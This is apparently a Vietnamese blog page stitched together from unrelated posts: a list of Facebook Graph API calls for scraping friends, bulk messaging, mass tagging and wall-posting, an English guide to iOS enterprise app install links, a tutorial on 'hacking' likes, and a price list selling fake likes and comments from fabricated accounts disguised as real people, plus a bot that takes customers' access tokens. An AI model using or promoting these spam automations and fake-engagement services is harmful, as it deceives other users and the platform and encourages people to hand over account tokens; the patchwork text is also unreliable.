https://graph.facebook.com/fql?q=SELECT+uid,+name,+friend_count,+subscriber_count+FROM+user+WHERE+uid+IN+(SELECT+uid2+FROM+friend+WHERE+uid1+=+me())++ORDER+BY+rand()+LIMIT+5000&access_token=
4. Lấy danh sách bạn bè bị Rip, Block, FAQ :
https://graph.facebook.com/fql?q=SELECT+id,+can_post,+name+FROM+profile+WHERE+id+IN+(SELECT+uid2+FROM+friend+WHERE+uid1+=+me())+AND+name+=+"Facebook+User"+ORDER+BY+rand()+LIMIT+5000&access_token=
5. Lấy danh sách lời mời kết bạn : 
https://graph.facebook.com/?access_token=&batch=[{"name":+"friendrequests",+"method":"GET",+"relative_url":"v1.0/me/friendrequests?limit=5000"},+{"method":"GET",+"relative_url":"fql?q=SELECT+uid,+name,+mutual_friend_count,+sex+FROM+user+WHERE+uid+IN+({result=friendrequests:$.data[*].from.id})"}]&include_headers=false&method=post
6. Graph Api Search :

     6.1 Mọi Người :
https://graph.facebook.com/search?type=user&q=tu_khoa_tim_kiem&limit=gioi_han_toi_da&fields=id,name&access_token=
     6.2 Trang :
https://graph.facebook.com/search?type=page&q=tu_khoa_tim_kiem&limit=gioi_han_toi_da&=id,name,icon&access_token=
     6.3 Nhóm :
https://graph.facebook.com/search?type=group&q=tu_khoa_tim_kiem&limit=gioi_han_toi_da&=id,name,icon&access_token=
7. Scan những nhóm đang làm admin và đã tham gia :
https://graph.facebook.com/?method=post&access_token=&batch=[{"method":"GET","relative_url":"me"},+{"method":"GET","relative_url":"me/groups?fields=icon,administrator,name%26limit=5000"}]&include_headers=false
8. Scan nhóm đang tham gia :
https://graph.facebook.com/?method=post&access_token=&batch=[{"method":"GET","relative_url":"me"},+{"method":"GET","relative_url":"me/groups?fields=icon,administrator,name%26limit=5000"}]&include_headers=false
9. Đếm like trang :
https://graph.facebook.com/fql?q=SELECT+page_id,+name,+fan_count,+access_token+FROM+page+WHERE+page_id+IN+(SELECT+page_id+FROM+page_admin+WHERE+uid+=+me()+ORDER+by+rand()+LIMIT+5000)&access_token=
10. Gửi tin nhắn theo list id đã cài sẵn :
https://graph.facebook.com/me/threads?locale=en_US&to=[{"type":"id","id":"4","id":"4"}]&method=post&return_structure=true&message=1&link=2&name=3&picture=4&description=5&access_token=
11. Mời thích trang :
https://graph.facebook.com/idTrang/invited?method=post&invitee_id=id_can_moi&access_token=
12. Mời tham gia sự kiện :
https://graph.facebook.com/idSuKien/invited?method=post&users=id_can_moi&access_token=
13. Comments tag bạn bè :
https://graph.facebook.com/172689179864813/comments?method=post&access_token=&message=123+@[id_bb:0]+@[id_bb:0]
14. Share Post nên tường bạn bè :
https://graph.facebook.com/id_bb/feed?locale=en_US&method=post&return_structure=true&message=tin_nhan&link=Link_share&name=tieu_de_link&picture=link_anh&description=mo_ta&caption=trang_muon_fake&access_token=
15. Share tag bạn bè :
https://graph.facebook.com/me/feed?method=post&access_token=&message=1&link=2&tags=id_bb,id_bb
16. Share post group :
https://graph.facebook.com/id_post_can_share/sharedposts?to=id_group&locale=en_US&method=post&return_structure=true&message=tin_nhan&access_token=
 Và đó là toàn bộ Graph Api hữu dụng nhất hiện nay mà mình muốn chia sẻ . Bạn nào biết Graph Api nào hay hơn thì chia sẻ nhé .
Luôn theo dõi bài viết nhé . Mình sẽ luôn cập nhập Graph Api mới
Lưu Ý : Token để sử dụng các Graph Api trên là token IOS với token htc
Lời Kết : Chúc các bạn tìm kiếm được Graph Api mình mong muốn qua bài viết này 
Tồng Hợp Api : Vutienanh.pro

Tạo link cài đặt Enterprise App iOS

Follow these instructions on how to create a link to your enterprise “.ipa” file. By doing this, your enterprise app can be installed by simply clicking a link on an iOS device.

How to Create an Installation Link for Your Enterprise App

1. Place the enterprise “.ipa” file, found in the “.tgz” file that you downloaded from the mag+ Publish portal, on a web server and give it a direct URL.

2. Download the “app.plist” file attached to the bottom of this article to your machine.

3. Open the “app.plist” file with a text editor and make the changes specified below.

Important Information
These are the items to change: 
  • Find “<string>http://www.enterprise_4.0.ipa</string>” and change the URL to the URL of the enterprise.ipa file located on your web server.
  • Find “BUNDLE_ID” and enter the Bundle ID for your app.
  • Find “NAME_OF_APP” and enter the name of your app.

4. Save the “app.plist” file and upload it to an accessible web server.

5. Create a link as shown below and post it on a web site or email it to the users that you want to download your app.

Important Information
Your link should look like: itms-services://?action=download-manifest&amp;url=http://yourdomainname.com/app.plist. Replace “http://yourdomainname.com/app.plist” with the URL to the app.plist file located on your web server.

How to Install an Enteprise App from an Emailed Link

1. Find the link created in the steps above (either via email or via a web page).

2. On your iOS device, click on the link or paste it into the URL field of Safari.

3. The app will be installed on the device.

Screen-2BShot-2B2018-03-22-2Bat-2B9.59.25-2BAM.png

4 bước đơn giản để hack like, share, theo dõi và bình luận facebook

Ngày nay mạng xã hội facebook ngày càng phát triển, do đó nhu cầu tăng like, tăng theo dõi trên facebook là rất cần thiết cho mọi đối tượng sử dụng

Một số trang web cho phép hack like bài viết facebook, tăng theo dõi trang cá nhân trên facebook miễn phí như ilikesub.com hoặc sever vip như dungqb.net

Nhưng liệu bạn đã biết cách công khai bài viết, mở theo dõi để có thể auto like, hack sub, hack share, auto comment?

Bài viết này mình sẽ hướng dẫn các bạn làm điều đó 😀

Để có thể tăng like bài viết trên facebook tài khoản của bạn phải trên 18 tuổi (tính theo tuổi bạn đăng ký trên facebook) và thực hiện các bước sau:

Đầu tiên bạn phải vào cài đặt facebook tại đây: https://www.facebook.com/settings

Bước 1: Nhấp chọn mục bài viết công khai

Bước 2: Mục ai có thể theo dõi tôi? chọn Mọi người. Phần này giúp tài khoản của bạn có thể tăng theo dõi, tăng bạn bè và công khai bài viết.

Bước 3: Mục ai có thể bình luận về những bài viết công khai của bạn? chọn Mọi người. Phần này giúp tài khoản của bạn có thể sử dụng auto comment cho bài viết.

Bước 4: Mục ai có thể thích hoặc bình luận về ảnh đại diện công khai và các thông tin khác trên trang cá nhân của tôi? chọn Mọi người. Nhiều người không để ý mục này nên không thể tăng like, comment, share cho avatar

Chúc các bạn thành công 🙂

1.png

Hướng dẫn lấy link bài viết facebook và link trang cá nhân để auto like

1. LẤY LINK BÀI VIẾT FACEBOOK:

Để tăng được like, comment, share cho bài viết thì bạn phải có link bài viết. Sau đây mình sẽ hướng dẫn các bạn lấy link bài viết trên máy tính và điện thoại

– Trên máy tính:
+ Sau khi đăng bài bạn click vào thời gian đăng bài viết

+ Tiếp theo bạn copy địa chỉ trang web là bạn sẽ có link bài viết

+ Cuối cùng dán link đến nới bạn cần sử dụng
– Trên điện thoại:
+ Đầu tiên bạn tìm tới bài viết cần lấy link, sau đó nhấn vào nút chia sẻ
+ Chọn sao chép liên kết.
+ Cuối cùng dán link đến nới bạn cần sử dụng.
2. LẤY LINK TRANG CÁ NHÂN FACEBOOK:
– Trên máy tính
+ Copy địa chỉ web trên trình duyệt
+ Dán link đến nơi bạn cần lấy
– Trên điện thoại

+ Đầu tiên bạn tìm tới bài viết cần lấy link, sau đó nhấn vào nút chia sẻ
+ Chọn sao chép liên kết.
+ Cuối cùng dán link đến nới bạn cần sử dụng.
+ Xóa phần cuối của link sau chữ post
ví dụ: https://www.facebook.com/songgioqb/posts/771661689672237
bạn xóa phần màu đỏ đi thì sẽ lấy được link trang cá nhân là 
https://www.facebook.com/songgioqb

Như vậy bạn có thể sử dụng link bài viết hoặc link trang cá nhân để tăng like facebook hay tăng theo dõi facebook được rồi

Chúc các bạn thành công

Để mua like theo dõi facebook cùng các dịch vụ facebook khác vui lòng xem thêm ở đây nhé

https://dungqb.com/?p=125

Screen-2BShot-2B2017-04-28-2Bat-2B12.51.02-2BPM.png

Báo giá các dịch vụ VIP Seeding TD-SOFT

Hiện tại TD-SOFT đang có cung cấp các dịch vụ vip like cho khách hàng


1. VIP LIKE THEO SỐ LƯỢNG



BẢNG GIÁ DỊCH VỤ FACEBOOK VIP LIKE BÀI VIẾT THEO SỐ LƯỢNG

TÊN GÓI SỐ LƯỢNG LIKE MUA GIÁ MỖI LIKE SỐ LƯỢNG MUA TỐI THIỂU CẢM XÚC ĐƯỢC CHỌN TỐC ĐỘ TĂNG LIKE THỜI GIAN SỬ DỤNG
SL0 Từ 0 đến 500.000 likes 20.000 likes = 100.000đ

LIKE
LOVE
HAHA
WOW
ANGRY
SAD

Nhanh hoặc chậm

(Từ 0 đến 60 giây mỗi likes

tùy theo khách lựa chọn)

Vĩnh viễn

(Đến khi hết like trong tài khoản,

không sử dụng sẽ không mất)

SL500 Từ 500.000 đến 1.000.000 likes 500.000 likes = 2.000.000đ
SL1000 Từ 1.000.000 đến 2.000.000 likes 3.5đ 1.000.000 likes = 3.500.000đ
SL2000 Từ 2.000.000 đến 3.000.000 likes 2.000.000 likes = 6.000.000đ


– Là dịch vụ mua like theo số lượng, không giới hạn thời gian sử dụng, tài khoản like là những tài khoản facebook được TD-SOFT tự tạo, Việt Nam, có đầy đủ avatar, ảnh bìa và tên tuổi như người thật 
– Buff dần đến bao giờ hết like thì thôi.
– Ví dụ mua 500.000đ bạn sẽ có 100.000 like tài khoản
+ Mỗi khi cần tăng like cho bài viết nào thì vào trang quản lý tài khoản của TD-SOFT nhập id bài viết, số lượng like cần tăng và bắt đầu
+ Số like sẽ trừ dần cho đến khi hết
+ Hỗ trợ tối thiểu 10 like, tối đa 200.000 like mỗi bài viết
+ Ngoài like còn hỗ các loại cảm xúc khác như love,haha,wow,…
+ Hỗ trợ giới hạn tốc độ lên like nhanh hoặc chậm
– Khuyến mại cực lớn cho khách hàng mua số lượng lớn

Ví dụ 1 bài viết like, cảm xúc bằng phương pháp này:

2. VIP BOT LIKE TƯƠNG TÁC



BẢNG GIÁ DỊCH VỤ FACEBOOK VIP LIKE TƯƠNG TÁC TỰ ĐỘNG TĂNG LIKE MỖI KHI ĐĂNG BÀI VIẾT THEO THÁNG

TÊN
GÓI
SỐ LIKE TỐI ĐA
TRÊN 1 BÀI VIẾT
GIÁ
TRỌN GÓI
1 THÁNG
SỐ BÀI VIẾT
 TỐI ĐA 1 NGÀY
TỐC ĐỘ
TĂNG LIKE
CẢM XÚC
HỖ TRỢ
HỖ TRỢ THÊM
TT150 200 Likes 150.000 đ 20 Nhanh hoặc chậm

(Từ 0 đến 60 giây mỗi likes

tùy theo khách lựa chọn)

LIKE
LOVE
HAHA
WOW
ANGRY
SAD
Tùy chọn ngẫu nhiên số lượng like
từ 0 đến số like tối đa trên
1 bài viết của gói

Ví du:
Với gói TT150 (tối đa 200 like) thì
bạn có thể
tùy chọn ngẫu nhiên
mỗi bài viết tăng
từ 100 đến 200 like để tránh
bài nào
cũng có số lượng like
 giống nhau không tự nhiên giống ảo

TT250 500 Likes 250.000 đ
TT400 1.000 Likes 400.000 đ
TT700 2.000 Likes 700.000 đ
TT1000 3.000 Likes 1.000.000 đ
TT1400 4.000 Likes 1.400.000 đ
TT1900 5.000 Likes 1.900.000 đ
– Là dịch vụ chăm sóc like (và các loại cảm xúc khác) cho người dùng đặc biệt của TD-SOFT, tài khoản like là những tài khoản facebook được TD-SOFT tự tạo, Việt Nam, có đầy đủ avatar, ảnh bìa và tên tuổi như người thật 
– Bạn chỉ cần đăng ký gói, TD-SOFT sẽ tự động làm tất cả, bạn không phải làm gì
– Mỗi khi bạn đăng bài viết TD-SOFT sẽ tự động quét và tăng like bài viết đó theo số lượng gói định sẳn
– Tùy chọn lúc đăng ký gồm:
+ Số lượng like ngẫu nhiên mỗi bài viết: (Tối đa số lượng của gói)
+ Ngẫu nhiên thời gian giữa mỗi đợt like (Tối đa 60s mỗi đợt like)
+ Ngẫu nhiên số like mỗi đợt tăng (Tối đa 40 like mỗi đợt tăng)
+ Loại cảm xúc cần tăng (Hệ thống sẽ tự động ngẫu nhiên số lượng các loại cảm xúc được chọn)

Ví dụ: 
+ Mua gói like 500-1000 và chọn số lượng like mỗi bài viết ngẫu nhiên từ 800-1000 like
+ Ngẫu nhiên thời gian giữa mỗi đợt like: từ 5-10 giây
+ Ngẫu nhiên số like mỗi đợt tăng 0-5 like
+ Loại cảm xúc cần tăng: love,haha,…
Thì hệ thống sẽ hoạt động như sau:
Khi có bài viết mới hệ thống sẽ tự động tăng ngẫu nhiên trong khoảng 0 đến 5 like, sau đó chờ đợt ngẫu nhiên trong khoảng từ 5 đến 10 giây rồi tiếp tục lặp lại cho đến khi đủ số lượng like ngẫu nhiên từ 800- 1000 likes, cảm xúc mỗi bài viết.

Để đăng ký bạn cần chuyển khoản theo giá của gói cần chọn và gửi mình thêm các thông tin sau:
+ Số lượng like ngẫu nhiên mỗi bài viết: (Tối đa số lượng của gói)
+ Ngẫu nhiên thời gian giữa mỗi đợt like (Tối đa 60s mỗi đợt like)
+ Ngẫu nhiên số like mỗi đợt tăng (Tối đa 40 like mỗi đợt tăng)
+ Loại cảm xúc cần tăng (Hệ thống sẽ tự động ngẫu nhiên số lượng các loại cảm xúc được chọn)

Ví dụ 1 bài viết like, cảm xúc bằng phương pháp này:

3. VIP COMMENT THEO SỐ LƯỢNG

Bảng giá: 300đ/comment.



– Là dịch vụ mua comment (bình luận bài viết) theo số lượng, không giới hạn thời gian sử dụng.
– Tài khoản comment là những tài khoản facebook việt nam, thật, đang sử dụng bình thường tham gia sever trao đổi comment miễn phí. Vì người comment là người thật nên hạn chế tương tác lại comment đã chạy tránh phản hồi tiêu cực do người comment gây nên.
– Có thể tăng bình luận cho bài viết công khai trên trang cá nhân (yêu cầu mở theo dõi, và bình luận của người lạ), bài viết trên fanpage
– Không giới hạn thời gian sử dụng, bao giờ hết số comment trong tài khoản có thể mua tiếp
– Tạm thời hỗ trợ 100 comment cho mỗi bài viết
– Hỗ trợ tùy chọn giới tính, nơi ở, độ tuổi của người bình luận
Chế độ bảo hành:
– Do comment hoạt động dựa trên facebook nên đôi khi sẽ bị facebook chặn, TD-SOFT luôn cố gắng khắc phục nhanh nhất cho khách hàng sử dụng.
– TD-SOFT cam kết hoàn tiền số comment chưa sử dụng cho những khách hàng không muốn tiếp tục sử dụng hệ thống.
3. BOT CẢM XÚC TĂNG TƯƠNG TÁC:



Chi phí: 100.000đ / 1 tháng / 1 tài khoản facebook


– Là hệ thống tăng tương tác cho tài khoản facebook của bạn với mọi người (bạn bè của bạn, người bạn theo dõi,…)
– Để đăng ký bạn cần cung cấp token của tài khoản facebook để cài đặt
– Tự động thả tim, like,… (cảm xúc) 100% khi bạn bè đăng bài viết mới, không cần online hay kết nối mạng; tương tác bạn bè nhiều hơn thì người khác sẽ tương tác lại bạn.
– Hoạt động 24/24/7 không bỏ sót bài viết của bạn bè nào =&gt; tránh bị bạn bè hủy kết bạn vì kết bạn mà chỉ bán hàng không tương tác
– Tăng tương tác, giúp khách hàng và bạn bè chú ý đến mình hơn. Không còn tình trạng đăng bài không ai quan tâm
– Giúp bài viết của mình được ưu tiên trên newfeed của mọi người, tương tác bán hàng cao hơn, tốt hơn
– Chỉ cần cài đặt 1 lần duy nhất, hệ thống sẽ làm mọi thứ cho bạn
– Tác dụng rõ rệt chỉ sau vài ngày sử dụng, nếu sau 1 tháng mà bạn bè không thiện cảm với bạn hơn bên mình hoàn lại tiền nhé :v
– Tốc độ nhanh chậm, cảm xúc tùy chọn.